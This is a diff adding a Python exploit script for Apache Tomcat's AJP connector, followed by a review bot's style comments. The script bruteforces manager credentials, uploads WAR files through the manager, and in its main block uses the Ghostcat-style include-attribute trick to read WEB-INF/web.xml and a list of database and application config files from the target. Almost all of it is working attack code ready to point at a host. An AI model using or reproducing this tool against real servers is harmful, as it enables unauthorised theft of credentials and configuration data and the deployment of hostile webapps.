@@ -0,0 +1,363 @@ +######f0ng######usage:ip -p port +# -*- coding:utf-8 -*- +# +# Julien Legras - Synacktiv +# +# THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY +# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + +from ajpy.ajp import AjpResponse, AjpForwardRequest, AjpBodyRequest, NotFoundException +from pprint import pprint, pformat + +import socket +import argparse +import logging +import re +import os +from StringIO import StringIO +import logging +from colorlog import ColoredFormatter +from urllib import unquote + + +def setup_logger(): + """Return a logger with a default ColoredFormatter.""" + formatter = ColoredFormatter( + "[%(asctime)s.%(msecs)03d] %(log_color)s%(levelname)-8s%(reset)s %(white)s%(message)s", + datefmt="%Y-%m-%d %H:%M:%S", + reset=True, + log_colors={ + 'DEBUG': 'bold_purple', + 'INFO': 'bold_green', + 'WARNING': 'bold_yellow', + 'ERROR': 'bold_red', + 'CRITICAL': 'bold_red', + } + ) + + logger = logging.getLogger('meow') + handler = logging.StreamHandler() + handler.setFormatter(formatter) + logger.addHandler(handler) + logger.setLevel(logging.DEBUG) + + return logger + + +logger = setup_logger() + + +# helpers +def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): + fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) + fr.method = method + fr.protocol = "HTTP/1.1" + fr.req_uri 
= req_uri + fr.remote_addr = target_host + fr.remote_host = None + fr.server_name = target_host + fr.server_port = 80 + fr.request_headers = { + 'SC_REQ_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'SC_REQ_CONNECTION': 'keep-alive', + 'SC_REQ_CONTENT_LENGTH': '0', + 'SC_REQ_HOST': target_host, + 'SC_REQ_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', + 'Accept-Encoding': 'gzip, deflate, sdch', + 'Accept-Language': 'en-US,en;q=0.5', + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0' + } + fr.is_ssl = False + + fr.attributes = [] + + return fr + + +class Tomcat(object): + def __init__(self, target_host, target_port): + self.target_host = target_host + self.target_port = target_port + + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.socket.connect((target_host, target_port)) + self.stream = self.socket.makefile("rb", bufsize=0) + + def test_password(self, user, password): + res = False + stop = False + self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode( + 'base64').replace('\n', '') + while not stop: + logger.debug("testing %s:%s" % (user, password)) + responses = self.forward_request.send_and_receive(self.socket, self.stream) + snd_hdrs_res = responses[0] + if snd_hdrs_res.http_status_code == 404: + raise NotFoundException("The req_uri %s does not exist!" 
% self.req_uri) + elif snd_hdrs_res.http_status_code == 302: + self.req_uri = snd_hdrs_res.response_headers.get('Location', '') + logger.info("Redirecting to %s" % self.req_uri) + self.forward_request.req_uri = self.req_uri + elif snd_hdrs_res.http_status_code == 200: + logger.info("Found valid credz: %s:%s" % (user, password)) + res = True + stop = True + if 'Set-Cookie' in snd_hdrs_res.response_headers: + logger.info("Here is your cookie: %s" % (snd_hdrs_res.response_headers.get('Set-Cookie', ''))) + elif snd_hdrs_res.http_status_code == 403: + logger.info("Found valid credz: %s:%s but the user is not authorized to access this resource" % ( + user, password)) + stop = True + elif snd_hdrs_res.http_status_code == 401: + stop = True + + return res + + def start_bruteforce(self, users, passwords, req_uri, autostop): + logger.info("Attacking a tomcat at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) + self.req_uri = req_uri + self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri) + + f_users = open(users, "r") + f_passwords = open(passwords, "r") + + valid_credz = [] + try: + for user in f_users: + f_passwords.seek(0, 0) + for password in f_passwords: + if autostop and len(valid_credz) > 0: + self.socket.close() + return valid_credz + + user = user.rstrip('\n') + password = password.rstrip('\n') + if self.test_password(user, password): + valid_credz.append((user, password)) + except NotFoundException as e: + logger.fatal(e.message) + finally: + logger.debug("Closing socket...") + self.socket.close() + return valid_credz + + def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): + self.req_uri = req_uri + self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, + method=AjpForwardRequest.REQUEST_METHODS.get(method)) + logger.debug("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) + if user is not None and 
password is not None: + self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ( + "%s:%s" % (user, password)).encode('base64').replace('\n', '') + + for h in headers: + self.forward_request.request_headers[h] = headers[h] + + for a in attributes: + self.forward_request.attributes.append(a) + + responses = self.forward_request.send_and_receive(self.socket, self.stream) + print(responses) + if len(responses) == 0: + return None, None + + snd_hdrs_res = responses[0] + + data_res = responses[1:-1] + if len(data_res) == 0: + logger.info("No data in response. Headers:\n %s" % pformat(vars(snd_hdrs_res))) + + return snd_hdrs_res, data_res + + def upload(self, filename, user, password, old_version, headers={}): + deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) + with open(filename, "rb") as f_input: + with open("/tmp/request", "w+b") as f: + s_form_header = '------WebKitFormBoundaryb2qpuwMoVtQJENti\r\nContent-Disposition: form-data; name="deployWar"; filename="%s"\r\nContent-Type: application/octet-stream\r\n\r\n' % os.path.basename( + filename) + s_form_footer = '\r\n------WebKitFormBoundaryb2qpuwMoVtQJENti--\r\n' + f.write(s_form_header) + f.write(f_input.read()) + f.write(s_form_footer) + + data_len = os.path.getsize("/tmp/request") + + headers = { + "SC_REQ_CONTENT_TYPE": "multipart/form-data; boundary=----WebKitFormBoundaryb2qpuwMoVtQJENti", + "SC_REQ_CONTENT_LENGTH": "%d" % data_len, + "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), + "Origin": "http://%s" % (self.target_host), + } + if obj_cookie is not None: + headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') + + attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, + {"name": "req_attribute", "value": ("AJP_REMOTE_PORT", "12345")}] + if old_version == False: + attributes.append({"name": "query_string", "value": deploy_csrf_token}) + old_apps = self.list_installed_applications(user, password, old_version) + 
r = self.perform_request("/manager/html/upload", headers=headers, method="POST", user=user, password=password, + attributes=attributes) + + with open("/tmp/request", "rb") as f: + br = AjpBodyRequest(f, data_len, AjpBodyRequest.SERVER_TO_CONTAINER) + br.send_and_receive(self.socket, self.stream) + + r = AjpResponse.receive(self.stream) + if r.prefix_code == AjpResponse.END_RESPONSE: + logger.error('Upload failed') + + while r.prefix_code != AjpResponse.END_RESPONSE: + r = AjpResponse.receive(self.stream) + logger.debug('Upload seems normal. Checking...') + new_apps = self.list_installed_applications(user, password, old_version) + if len(new_apps) == len(old_apps) + 1 and new_apps[:-1] == old_apps: + logger.info('Upload success!') + else: + logger.error('Upload failed') + + def get_error_page(self): + return self.perform_request("/blablablablabla") + + def get_version(self): + hdrs, data = self.get_error_page() + for d in data: + s = re.findall('(Apache Tomcat/[0-9\.]+) ', d.data) + if len(s) > 0: + return s[0] + + def get_csrf_token(self, user, password, old_version, headers={}, query=[]): + # first we request the manager page to get the CSRF token + hdrs, rdata = self.perform_request("/manager/html", headers=headers, user=user, password=password) + deploy_csrf_token = re.findall('(org.apache.catalina.filters.CSRF_NONCE=[0-9A-F]*)"', + "".join([d.data for d in rdata])) + if old_version == False: + if len(deploy_csrf_token) == 0: + logger.critical("Failed to get CSRF token. 
Check the credentials") + return + + logger.debug('CSRF token = %s' % deploy_csrf_token[0]) + obj = re.match("(?PJSESSIONID=[0-9A-F]*); Path=/manager(/)?; HttpOnly", + hdrs.response_headers.get('Set-Cookie', '')) + if obj is not None: + return deploy_csrf_token[0], obj + return deploy_csrf_token[0], None + + def list_installed_applications(self, user, password, old_version, headers={}): + deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) + headers = { + "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded", + "SC_REQ_CONTENT_LENGTH": "0", + "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), + "Origin": "http://%s" % (self.target_host), + } + if obj_cookie is not None: + headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') + + attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, + {"name": "req_attribute", + "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}] + if old_version == False: + attributes.append({ + "name": "query_string", "value": "%s" % deploy_csrf_token}) + hdrs, data = self.perform_request("/manager/html/", headers=headers, method="GET", user=user, password=password, + attributes=attributes) + found = [] + for d in data: + im = re.findall('/manager/html/expire\?path=([^&]*)&', d.data) + for app in im: + found.append(unquote(app)) + return found + + def undeploy(self, path, user, password, old_version, headers={}): + deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) + path_app = "path=%s" % path + headers = { + "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded", + "SC_REQ_CONTENT_LENGTH": "0", + "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), + "Origin": "http://%s" % (self.target_host), + } + if obj_cookie is not None: + headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') + + attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, + {"name": 
"req_attribute", + "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}] + if old_version == False: + attributes.append({ + "name": "query_string", "value": "%s&%s" % (path_app, deploy_csrf_token)}) + r = self.perform_request("/manager/html/undeploy", headers=headers, method="POST", user=user, password=password, + attributes=attributes) + r = AjpResponse.receive(self.stream) + if r.prefix_code == AjpResponse.END_RESPONSE: + logger.error('Undeploy failed') + + # Check the successful message + found = False + regex = r'Message:<\/strong><\/small> <\/td>\s*
(OK - .*' + path + ')\s*<\/pre><\/td>'
+        while r.prefix_code != AjpResponse.END_RESPONSE:
+            r = AjpResponse.receive(self.stream)
+            if r.prefix_code == 3:
+                f = re.findall(regex, r.data)
+                if len(f) > 0:
+                    found = True
+        if found:
+            logger.info('Undeploy succeed')
+        else:
+            logger.error('Undeploy failed')
+
+
+if __name__ == "__main__":
+
+
+    parser = argparse.ArgumentParser()
+    parser.add_argument('target', type=str, help="Hostname or IP to attack")
+    parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
+    parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
+    args = parser.parse_args()
+    bf = Tomcat(args.target, args.port)
+    attributes = [
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', args.file]},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
+    ]
+    snd_hdrs_res, data_res = bf.perform_request(req_uri='/',method='GET', attributes=attributes)
+    print("".join([d.data for d in data_res]))
+
+    if "WEB-INF" in "".join([d.data for d in data_res]) or "properties" in "".join([d.data for d in data_res]):
+	    print("**********************注意可能有WEB-INF、properties配置文件*************************")
+
+    if "classpath" in "".join([d.data for d in data_res]) :
+	    print("**********************注意可能有classpath的xml文件*************************")
+
+    words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties',
+'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',
+'WEB-INF/classes/spring-websocket-v2.0.xml','WEB-INF/classes/spring-mvc.xml','WEB-INF/classes/log4j.properties']
+
+    for word in words_list:
+
+        print(":::::::::" + word + ":::::::::")
+        attributes = [
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', word]},
+        {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
+    ]
+        snd_hdrs_res, data_res = bf.perform_request(req_uri='/',method='GET', attributes=attributes)
+        if "Error report" in "".join([d.data for d in data_res]):
+		    pass
+        else:
+            print("".join([d.data for d in data_res]))
+
+
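Review bot: `if r.prefix_code == 3:` in `undeploy` hard-codes the packet type while the surrounding loop compares against `AjpResponse.END_RESPONSE`; it should read `if r.prefix_code == AjpResponse.SEND_BODY_CHUNK:`. The `__main__` block mixes a tab with spaces on the two `print(...)` lines under the `if "WEB-INF"` / `if "classpath"` checks and on the `pass` under `if "Error report"`, which is a `TabError` on Python 3 and only works on Python 2 because a tab counts as eight columns; re-indent with spaces. `"".join([d.data for d in data_res])` is rebuilt five times between the first `perform_request` call and the `words_list` loop; bind it once as `body = "".join(d.data for d in data_res)` and test `body`. `perform_request` leaves a `print(responses)` debug line beside the `logger.debug` calls, and the module imports `logging` twice. Nothing closes `bf.socket` on the `perform_request` path — only `start_bruteforce` closes it in its `finally` — so the `__main__` block should wrap the requests in `try:` … `finally: bf.socket.close()`.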